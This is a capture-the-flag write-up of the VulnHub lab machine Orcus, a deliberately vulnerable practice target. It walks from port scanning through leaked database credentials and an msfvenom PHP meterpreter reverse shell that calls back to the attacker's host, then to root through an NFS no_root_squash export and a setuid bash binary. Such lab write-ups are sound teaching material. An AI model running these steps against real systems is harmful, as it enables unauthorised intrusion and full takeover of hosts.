Orcus VulnHub Writeup
A set of machines from hackfest2016 landed recently. First up is Orcus by Viper.
Service discovery
root@kali:~# nmap -T4 -A -v -p0-65535 192.168.110.102
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-03-16 09:35 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Initiating ARP Ping Scan at 09:35
Scanning 192.168.110.102 [1 port]
Completed ARP Ping Scan at 09:35, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:35
Completed Parallel DNS resolution of 1 host. at 09:35, 0.02s elapsed
Initiating SYN Stealth Scan at 09:35
Scanning 192.168.110.102 [65536 ports]
Discovered open port 443/tcp on 192.168.110.102
Discovered open port 139/tcp on 192.168.110.102
Discovered open port 110/tcp on 192.168.110.102
Discovered open port 993/tcp on 192.168.110.102
Discovered open port 143/tcp on 192.168.110.102
Discovered open port 111/tcp on 192.168.110.102
Discovered open port 80/tcp on 192.168.110.102
Discovered open port 995/tcp on 192.168.110.102
Discovered open port 22/tcp on 192.168.110.102
Discovered open port 445/tcp on 192.168.110.102
Discovered open port 53/tcp on 192.168.110.102
Discovered open port 2049/tcp on 192.168.110.102
Discovered open port 59908/tcp on 192.168.110.102
Discovered open port 46495/tcp on 192.168.110.102
Discovered open port 43740/tcp on 192.168.110.102
Discovered open port 44039/tcp on 192.168.110.102
Completed SYN Stealth Scan at 09:35, 2.36s elapsed (65536 total ports)
Initiating Service scan at 09:35
Scanning 16 services on 192.168.110.102
Completed Service scan at 09:35, 11.02s elapsed (16 services on 1 host)
Initiating OS detection (try #1) against 192.168.110.102
NSE: Script scanning 192.168.110.102.
Initiating NSE at 09:35
Completed NSE at 09:35, 8.75s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.03s elapsed
Nmap scan report for 192.168.110.102
Host is up (0.00032s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING STLS RESP-CODES UIDL AUTH-RESP-CODE TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after: 2026-10-09T03:44:10
| MD5: ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 33448/udp mountd
| 100005 1,2,3 59908/tcp mountd
| 100021 1,3,4 44039/tcp nlockmgr
| 100021 1,3,4 59276/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 have STARTTLS post-login listed Pre-login LITERAL+ OK capabilities ENABLE SASL-IR LOGIN-REFERRALS IDLE ID
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after: 2026-10-09T03:44:10
| MD5: ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 have post-login listed capabilities Pre-login LITERAL+ OK SASL-IR ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS IDLE ID
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after: 2026-10-09T03:44:10
| MD5: ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER PIPELINING RESP-CODES UIDL AUTH-RESP-CODE TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-09T03:44:10
| Not valid after: 2026-10-09T03:44:10
| MD5: ad50 6e67 26f1 7969 4bcd 2696 5347 a592
|_SHA-1: 01e5 ecc7 994a a19d 45e8 f4c2 b4cf 98b5 10a4 771f
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs_acl 2-3 (RPC #100227)
43740/tcp open mountd 1-3 (RPC #100005)
44039/tcp open nlockmgr 1-4 (RPC #100021)
46495/tcp open mountd 1-3 (RPC #100005)
59908/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:33:F7:2B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 199.638 days (since Sun Aug 28 18:17:49 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
| nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ORCUS<00> Flags: <unique><active>
| ORCUS<03> Flags: <unique><active>
| ORCUS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name:
| NetBIOS computer name: ORCUS
| Workgroup: WORKGROUP
|_ System time: 2017-03-16T09:35:46-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.110.102
NSE: Script Post-scanning.
Initiating NSE at 09:35
Completed NSE at 09:35, 0.01s elapsed
Initiating NSE at 09:35
Completed NSE at 09:35, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ -0s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.52 seconds
Raw packets sent: 65559 (2.885MB) | Rcvd: 65552 (2.623MB)
Port 80
The first target will be the apache server running on port 80. I know that there are several entries in robots.txt, but for good measure I run dirsearch
root@kali:~/dirsearch# python3 dirsearch.py -u 192.168.110.102 -e php
_|. _ _ _ _ _ _|_ v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 5151
Error Log: /root/dirsearch/logs/errors-17-03-16_10-00-20.log
Target: 192.168.110.102
[10:00:20] Starting:
[10:00:20] 403 - 303B - /.htaccess-dev
[10:00:20] 403 - 294B - /.hta
[10:00:20] 403 - 304B - /.htaccess.bak1
[10:00:20] 403 - 305B - /.htaccess-marco
[10:00:20] 403 - 305B - /.htaccess-local
[10:00:20] 403 - 304B - /.htaccess.orig
[10:00:20] 403 - 303B - /.htaccess.BAK
[10:00:20] 403 - 304B - /.htaccess.save
[10:00:20] 403 - 301B - /.ht_wsr.txt
[10:00:20] 403 - 306B - /.htaccess.sample
[10:00:20] 403 - 303B - /.htaccess.old
[10:00:20] 403 - 303B - /.htaccessOLD2
[10:00:20] 403 - 302B - /.htaccessOLD
[10:00:20] 403 - 303B - /.htaccess.txt
[10:00:20] 403 - 305B - /.htaccess_extra
[10:00:20] 403 - 302B - /.htaccessBAK
[10:00:20] 403 - 300B - /.htaccess~
[10:00:20] 403 - 304B - /.htaccess_orig
[10:00:20] 403 - 303B - /.htpasswd-old
[10:00:20] 403 - 302B - /.htaccess_sc
[10:00:20] 403 - 298B - /.htgroup
[10:00:20] 403 - 298B - /.htusers
[10:00:20] 403 - 304B - /.htpasswd_test
[10:00:20] 403 - 300B - /.htpasswds
[10:00:21] 200 - 50KB - /CHANGELOG.md
[10:00:21] 200 - 750B - /FCKeditor/
[10:00:21] 301 - 322B - /FCKeditor -> http://192.168.110.102/FCKeditor/
[10:00:22] 200 - 2KB - /README.md
[10:00:23] 301 - 318B - /admin -> http://192.168.110.102/admin/
[10:00:23] 200 - 49B - /admin/
[10:00:23] 200 - 49B - /admin/?/login
[10:00:23] 403 - 305B - /admin/.htaccess
[10:00:23] 200 - 49B - /admin/index.php
[10:00:25] 301 - 320B - /backups -> http://192.168.110.102/backups/
[10:00:25] 200 - 1KB - /backups/
[10:00:26] 301 - 318B - /files -> http://192.168.110.102/files/
[10:00:26] 200 - 1KB - /files/
[10:00:27] 200 - 4KB - /index.php
[10:00:27] 200 - 101B - /index.html
[10:00:27] 200 - 4KB - /index.php/login/
[10:00:27] 301 - 320B - /install -> http://192.168.110.102/install/
[10:00:27] 302 - 0B - /install/ -> ../index.php
[10:00:27] 301 - 323B - /javascript -> http://192.168.110.102/javascript/
[10:00:28] 302 - 0B - /login.php -> http://192.168.110.102/index.php?controller=login&action=showlogin
[10:00:28] 302 - 0B - /login.php -> http://192.168.110.102/index.php?controller=login&action=showlogin
[10:00:29] 301 - 323B - /phpmyadmin -> http://192.168.110.102/phpmyadmin/
[10:00:29] 200 - 10KB - /phpmyadmin/
[10:00:29] 200 - 1KB - /robots.txt
[10:00:30] 403 - 303B - /server-status
[10:00:30] 403 - 304B - /server-status/
[10:00:31] 200 - 0B - /test.php
[10:00:31] 301 - 319B - /themes -> http://192.168.110.102/themes/
[10:00:31] 302 - 0B - /thumb.php -> /framework/core/assets/images/default_preview_notfound.gif
[10:00:31] 301 - 316B - /tmp -> http://192.168.110.102/tmp/
[10:00:31] 200 - 934B - /tmp/
Task Completed
In addition to the files and directories listed in robots.txt, I note that the directory /backups is discovered by dirsearch.
[ ] SimplePHPQuiz-Backupz.tar.gz 2016-10-31 20:29 210K
[ ] ssh-creds.bak 2016-11-01 21:33 12
The file ssh-creds.bak is not readable, however the file SimplePHPQuid-Backupz.tar.gz is.
After downloading and extracting this file, we find the database credentials of dbuser and dbpassword in the file includes/db_conn.php
<?php
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');
@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
if (mysqli_connect_error()){
echo "Could not connect to MySql. Please try again";
exit();
}
?>
In the previous directory listing, I note that phpmyadmin is available to us. We're able to login to phpmyadmin using the above credentials. The databases are listed as follows.
Adem
information_schema
mysql
performance_schema
PHPFusion
phpmyadmin
quizdb
SimplePHPQuiz
sys
zencart
zenphoto
There's not a great deal of interest in any of these databases - most are empty, and the only one that has any content of potential interest is zencart. While we have access to mysql.users, we do not have any users that would elevate our access further from phpmyadmin.
INSERT INTO `user` (`Host`, `User`, `authentication_string`) VALUES
('localhost', 'root', ''),
('viperhard', 'root', ''),
('127.0.0.1', 'root', ''),
('::1', 'root', ''),
('localhost', 'debian-sys-maint', '*58B9CCC97BEDA9955672ECB575F0D95B102FCC6F'),
('localhost', 'mysql.sys', '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE'),
('localhost', 'dbuser', '*6207EE3F049D8F87CC0B4BBB8814917B31FB8E4F'),
('localhost', 'phpmyadmin', '*4781D0CCF5870B70A6AACB8FF1E01BB9F619A6C6');
Zenphoto
After finding zenphoto available in the directory /zenphoto, we discover that it has not yet been installed. I waste no time and utilise the credentials previously discovered to setup zenphoto.
There do not appear to be any inherant vulnerabilities in the core installed of zenphoto, however there is a plugin available to enable named elFinder. The description of the plugin is as follows.
Provides file handling for the upload/files tab and the TinyMCE file browser.
After enabling the plugin, we are able to view, edit and create files via http://192.168.110.102/zenphoto/zp-core/zp-extensions/elFinder/filemanager.php?page=upload&tab=elFinder&type=files.
I create a meterpreter payload and upload it to themes/meterpreter.php.
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.103 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 27033 bytes
Time to start up our listener in msfconsole.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.103
LHOST => 192.168.110.103
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.110.103:4444
[*] Starting the payload handler...
I trigger the payload with a curl command.
root@kali:~# curl http://192.168.110.102/zenphoto/themes/meterpreter.php
We're rewarded with a meterpreter session.
[*] Meterpreter session 1 opened (192.168.110.103:4444 -> 192.168.110.102:39056) at 2017-03-20 15:40:03 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter >
I proceed to gain a shell, and find a flag in the /var/www directory.
meterpreter > shell
Process 2800 created.
Channel 0 created.
ls -lah /var/www
total 16M
drwxr-xr-x 4 root root 4.0K Oct 22 14:58 .
drwxr-xr-x 14 root root 4.0K Oct 28 14:02 ..
-rw-r--r-- 1 root root 5.5M Dec 17 2015 9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
-rw-r--r-- 1 root root 1.2M Apr 28 2014 a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
-rw-r--r-- 1 root root 8.8M Dec 1 2015 b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
-rw------- 1 www-data www-data 33 Oct 22 13:46 flag.txt
d-wx--x--x 15 www-data www-data 4.0K Mar 16 09:44 html
drwxrwxr-x 8 root root 4.0K Sep 21 2015 zenphoto-zenphoto-1.4.10
cat /var/www/flag.txt
868c889965b7ada547fae81f922e45c4
Elevation
Time to elevate our shell from www-user to root.
After checking the other services (ssh, bind, dovecot, samba, nfs, mountd), the only one that jumped out at me was nfs. During enumeration via our shell, I also discovered a couple of postgresql instances running, but these yielded no secrets.
Before moving on, I'll note that I discovered what could be considered another flag in /etc/kippo/data/userdb.txt.
cat /etc/kippo/data/userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!
I proceed to list the mounts available to us on the target.
root@kali:~# showmount -e 192.168.110.102
Export list for 192.168.110.102:
/tmp *
Time to mount this on our testing machine.
root@kali:~# mkdir /tmp/orcus
root@kali:~# mount -t nfs 192.168.110.102:/tmp /tmp/orcus
root@kali:~# ls -lah /tmp/orcus
total 36K
drwxrwxrwt 9 root root 4.0K Mar 16 17:25 .
drwxrwxrwt 9 root root 4.0K Mar 20 09:25 ..
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .font-unix
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .ICE-unix
drwx------ 3 root root 4.0K Mar 16 17:23 systemd-private-1f6894c2997b4017a4f2b5ec650a3234-dovecot.service-Qos2Dc
drwx------ 3 root root 4.0K Mar 16 17:23 systemd-private-1f6894c2997b4017a4f2b5ec650a3234-systemd-timesyncd.service-IslOZP
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .Test-unix
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .X11-unix
drwxrwxrwt 2 root root 4.0K Mar 16 17:23 .XIM-unix
So - we've mounted the /tmp directory on the target. Who is nfs running as on the target?
ps aux | grep nfs
root 1402 0.0 0.0 0 0 ? S< 09:34 0:00 [nfsd4_callbacks]
root 1405 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1407 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1408 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1409 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1410 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1411 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1415 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
root 1416 0.0 0.0 0 0 ? S 09:34 0:00 [nfsd]
www-data 2873 0.0 0.1 3028 848 ? S 10:38 0:00 grep nfs
And what is our nfs config?
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)
Awesome - so we can chmod and chown to our hearts content.
I upload a very simple program that will set our gid and uid, and execute /bin/bash to /tmp/shell.c
#include <unistd.h>
main( int argc, char ** argv, char ** envp )
{
setgid(0);
setuid(0);
system("/bin/bash", argv, envp);
return 0;
}
I proceed to compile the program.
gcc -o shell shell.c
shell.c:3:1: warning: return type defaults to 'int' [-Wimplicit-int]
main( int argc, char ** argv, char ** envp )
^
shell.c: In function 'main':
shell.c:7:2: warning: implicit declaration of function 'system' [-Wimplicit-function-declaration]
system("/bin/bash", argv, envp);
^
From our testing machine, and via the nfs mount, I chown the shell binary to root, and set the suid and sgid bits.
root@kali:/tmp/orcus# chown root:root shell
root@kali:/tmp/orcus# chmod +s shell
Finally, I execute the program on the target.
ls -lah
total 48K
drwxrwxrwt 9 root root 4.0K Mar 16 10:40 .
drwxr-xr-x 24 root root 4.0K Oct 30 23:05 ..
drwxrwxrwt 2 root root 4.0K Mar 16 09:34 .ICE-unix
drwxrwxrwt 2 root root 4.0K Mar 16 09:34 .Test-unix
drwxrwxrwt 2 root root 4.0K Mar 16 09:34 .X11-unix
drwxrwxrwt 2 root root 4.0K Mar 16 09:34 .XIM-unix
drwxrwxrwt 2 root root 4.0K Mar 16 09:34 .font-unix
-rwsr-sr-x 1 root root 7.3K Mar 16 10:40 shell
-rw-r--r-- 1 www-data www-data 139 Mar 16 10:40 shell.c
drwx------ 3 root root 4.0K Mar 16 09:34 systemd-private-4fdc5fc8b7114fac9e9b67df64887946-dovecot.service-oJ1cF2
drwx------ 3 root root 4.0K Mar 16 09:34 systemd-private-4fdc5fc8b7114fac9e9b67df64887946-systemd-timesyncd.service-YXlVEN
./shell
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Great stuff - let's grab our last flag.
ls -lah /root
total 44K
drwx------ 6 root root 4.0K Mar 11 17:25 .
drwxr-xr-x 24 root root 4.0K Oct 30 23:05 ..
-rw------- 1 root root 118 Mar 11 21:10 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
drwx------ 3 root root 4.0K Nov 1 22:22 .cache
drwx------ 3 root root 4.0K Oct 11 21:37 .config
drwxr-xr-x 2 root root 4.0K Oct 28 20:26 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Oct 22 22:18 .ssh
-rw------- 1 root root 657 Nov 1 20:56 .viminfo
---------- 1 root root 33 Oct 22 13:36 flag.txt
cat /root/flag.txt
807307b49314f822985d0410de7d8bfe
Last flag
It's noted on the machine description that there are four flags - however the last one states you should find the difference between the three VMs. As I'm limited on time at the moment, I decided to go ahead and publish this writeup, and come back to the other two in the future.
Summary
A nice VM - very noisy, lots of services to enumerate, which made finding the way in all the more pleasing. It took me a bit longer than it should of to spot the nfs mount, but I got there in the end!
Thanks for the great VM Viper, and as always thanks to VulnHub for hosting it!